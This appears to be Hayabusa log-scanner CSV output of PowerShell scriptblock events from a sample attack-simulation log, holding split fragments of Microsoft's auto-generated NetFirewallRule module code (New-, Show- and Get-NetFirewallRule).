Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetFirewallRule' function Show-NetFirewallRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetFirewallRule' function Get-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.Conta",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"insKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 